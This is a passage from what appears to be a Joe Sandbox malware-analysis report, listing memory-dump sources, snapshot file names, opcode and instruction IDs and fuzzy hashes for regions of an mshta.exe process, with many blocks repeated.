                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721D130A15210CBCB2D8F28C880765B7E2EBC5355F7881A9E9561B2CAC3B18C86CB52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E138000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 73449c105dd2200356b55bf4993da19d780e42c33f8dafb519e78ac52b66685b
                                                                                                                                                                                                                                • Instruction ID: 5f0ce95bfad60669b22bf3b0b02a96cf26b8a3bb034f5cbd948a68ccd702f64b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73449c105dd2200356b55bf4993da19d780e42c33f8dafb519e78ac52b66685b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721D130A15210CBCB2D8F28C880765B7E2EBC5355F7881A9E9561B2CAC3B18C86CB52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 73449c105dd2200356b55bf4993da19d780e42c33f8dafb519e78ac52b66685b
                                                                                                                                                                                                                                • Instruction ID: 5f0ce95bfad60669b22bf3b0b02a96cf26b8a3bb034f5cbd948a68ccd702f64b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73449c105dd2200356b55bf4993da19d780e42c33f8dafb519e78ac52b66685b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721D130A15210CBCB2D8F28C880765B7E2EBC5355F7881A9E9561B2CAC3B18C86CB52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 73f2133f9c0cbab38df6ff18c7865e374e721e93c3109bf3e7d2b789a53231db
                                                                                                                                                                                                                                • Instruction ID: e4ddbc2e5d24fd99afbd28429390e871e0bbebf2f950f8d8cc4b0b70a8883b99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73f2133f9c0cbab38df6ff18c7865e374e721e93c3109bf3e7d2b789a53231db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71210470740305AFD7548F68D852EBAB7E5FB84710F25804AF94A9B281C370CD508BA2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction ID: 606a978e563c52ff3283a9f833f20e7e2f359f8fb7e919661770a6f4eaabdd9c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66110431A55218EBCB64CBB4C982EBDF3B6AF80714F328100E406BB544C374BD8187B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 097e1f02ab8ec88aa56a4be5c0552f48f60efd34707b90c6caee28a40dbbc910
                                                                                                                                                                                                                                • Instruction ID: b4a9eccefddb0914074fe560d08198abb41caebb8f37126faa85d44b18bb5cdf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 097e1f02ab8ec88aa56a4be5c0552f48f60efd34707b90c6caee28a40dbbc910
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9521513AA106208BEB248B58C5507B6F3E9EF88324F36456ADD46A7790C775EDD0CB81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction ID: 606a978e563c52ff3283a9f833f20e7e2f359f8fb7e919661770a6f4eaabdd9c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66110431A55218EBCB64CBB4C982EBDF3B6AF80714F328100E406BB544C374BD8187B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction ID: 606a978e563c52ff3283a9f833f20e7e2f359f8fb7e919661770a6f4eaabdd9c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66110431A55218EBCB64CBB4C982EBDF3B6AF80714F328100E406BB544C374BD8187B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E139000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction ID: 606a978e563c52ff3283a9f833f20e7e2f359f8fb7e919661770a6f4eaabdd9c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b969391d02f9e7daa82724aa5e2d1952539d6607c81f81789c4b6985a6ba4bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66110431A55218EBCB64CBB4C982EBDF3B6AF80714F328100E406BB544C374BD8187B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2617635942.000000000F025000.00000010.00000800.00020000.00000000.sdmp, Offset: 0F025000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_f025000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d810113bbd026792130c0b7a37321be69cf0b005c176907740a7c9845bc86566
                                                                                                                                                                                                                                • Instruction ID: 3954476162b3a605b1e133c64e63972149ee51aef4fd80cdff500c6cdc1a46b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d810113bbd026792130c0b7a37321be69cf0b005c176907740a7c9845bc86566
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C11A174A093948FEB44CF94D8A17B9BBF1BF49314F5401AEC8495F382C7B88A05CB64
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2625573098.000000000E140000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e13e000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9ce4142fbcbf26735281bb77c17c7ed82398d86f3b79a6194cd8ccfb3dbb0d69
                                                                                                                                                                                                                                • Instruction ID: 08893306cd5effcfbaa6dd3f45ac9a580dd994171304f08fab7fad6b9ed32443
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ce4142fbcbf26735281bb77c17c7ed82398d86f3b79a6194cd8ccfb3dbb0d69
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08015EB19092018FC714CF49D890A9AB7E4FF88320F15856AEEA99B351C731ED91CB82
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2625573098.000000000E140000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13E000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.2617568584.000000000E13E000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e13e000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9ce4142fbcbf26735281bb77c17c7ed82398d86f3b79a6194cd8ccfb3dbb0d69
                                                                                                                                                                                                                                • Instruction ID: 08893306cd5effcfbaa6dd3f45ac9a580dd994171304f08fab7fad6b9ed32443
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ce4142fbcbf26735281bb77c17c7ed82398d86f3b79a6194cd8ccfb3dbb0d69
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08015EB19092018FC714CF49D890A9AB7E4FF88320F15856AEEA99B351C731ED91CB82
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e59bb5ebf08375e8994baeb3310f11ab676c4e2a86c888def255fae2db9ac960
                                                                                                                                                                                                                                • Instruction ID: 696e12d9afdddf9858a24393a0bf3ce055b0d6ed9fa0eae15f8d1c2ab70277a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e59bb5ebf08375e8994baeb3310f11ab676c4e2a86c888def255fae2db9ac960
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2E086325481A92EE721A2B868976B4FF45BB1561CF1945D6DA950B093D2A508C1C3E2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E132000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e59bb5ebf08375e8994baeb3310f11ab676c4e2a86c888def255fae2db9ac960
                                                                                                                                                                                                                                • Instruction ID: 696e12d9afdddf9858a24393a0bf3ce055b0d6ed9fa0eae15f8d1c2ab70277a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e59bb5ebf08375e8994baeb3310f11ab676c4e2a86c888def255fae2db9ac960
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2E086325481A92EE721A2B868976B4FF45BB1561CF1945D6DA950B093D2A508C1C3E2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626776421.000000000E134000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E134000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cbdf406d832bcd91acdd467d55500b77e9bb783e4d800e9221a89c85e2378fb4
                                                                                                                                                                                                                                • Instruction ID: e4cf4f6a5071f2c9100e62c3d88398ec315ab770e8325332c609809f8a6d0296
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbdf406d832bcd91acdd467d55500b77e9bb783e4d800e9221a89c85e2378fb4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FED05E3330A2548F8709CE59E8924E5F3A5FB8922472581AFED6E87201D7669D1AC781
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626776421.000000000E134000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cbdf406d832bcd91acdd467d55500b77e9bb783e4d800e9221a89c85e2378fb4
                                                                                                                                                                                                                                • Instruction ID: e4cf4f6a5071f2c9100e62c3d88398ec315ab770e8325332c609809f8a6d0296
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbdf406d832bcd91acdd467d55500b77e9bb783e4d800e9221a89c85e2378fb4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FED05E3330A2548F8709CE59E8924E5F3A5FB8922472581AFED6E87201D7669D1AC781
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626564208.000000000E13F000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13E000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.2617568584.000000000E13E000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e13e000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 51e8946bc179dbd0aab1d0b7db2fb3a7e7558da212a401a356a93122fdef7632
                                                                                                                                                                                                                                • Instruction ID: 1294c0a57c14b584855cc6317759122290a745677bad668eb7b680ba15931664
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51e8946bc179dbd0aab1d0b7db2fb3a7e7558da212a401a356a93122fdef7632
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45D017325052048FD7118F98E8017C9F7F4EF56234F10829BED188B221D3759925CB81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626564208.000000000E13F000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13F000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e13e000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 51e8946bc179dbd0aab1d0b7db2fb3a7e7558da212a401a356a93122fdef7632
                                                                                                                                                                                                                                • Instruction ID: 1294c0a57c14b584855cc6317759122290a745677bad668eb7b680ba15931664
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51e8946bc179dbd0aab1d0b7db2fb3a7e7558da212a401a356a93122fdef7632
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45D017325052048FD7118F98E8017C9F7F4EF56234F10829BED188B221D3759925CB81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                • Instruction ID: 024572bef39be3135f2405c57f15f97decd17451cb29ec3be32e11493ab60d44
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6C012727091008B4700CE8DFCC0455F394FB8417471443A6E908C7211D651DC144791
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                • Instruction ID: 024572bef39be3135f2405c57f15f97decd17451cb29ec3be32e11493ab60d44
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6C012727091008B4700CE8DFCC0455F394FB8417471443A6E908C7211D651DC144791
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                • Instruction ID: 024572bef39be3135f2405c57f15f97decd17451cb29ec3be32e11493ab60d44
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad1c1f384a16fc0ac1d2e04527c31d240d51350d8de80c8b2e03c5c1560c3ed5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6C012727091008B4700CE8DFCC0455F394FB8417471443A6E908C7211D651DC144791
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f25f5428d43b95cf93c45ae8749359912bcd2398cc915fa0abfff4ec242685ef
                                                                                                                                                                                                                                • Instruction ID: 87b9a9a0c392634f17d89586fd725bb120bb4d6cc8a50e865c6a46fda02711d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f25f5428d43b95cf93c45ae8749359912bcd2398cc915fa0abfff4ec242685ef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14C08C32B491080BC2508E4CB8811C5F384EB90174F204393ED6987221E946986702C2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f25f5428d43b95cf93c45ae8749359912bcd2398cc915fa0abfff4ec242685ef
                                                                                                                                                                                                                                • Instruction ID: 87b9a9a0c392634f17d89586fd725bb120bb4d6cc8a50e865c6a46fda02711d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f25f5428d43b95cf93c45ae8749359912bcd2398cc915fa0abfff4ec242685ef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14C08C32B491080BC2508E4CB8811C5F384EB90174F204393ED6987221E946986702C2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
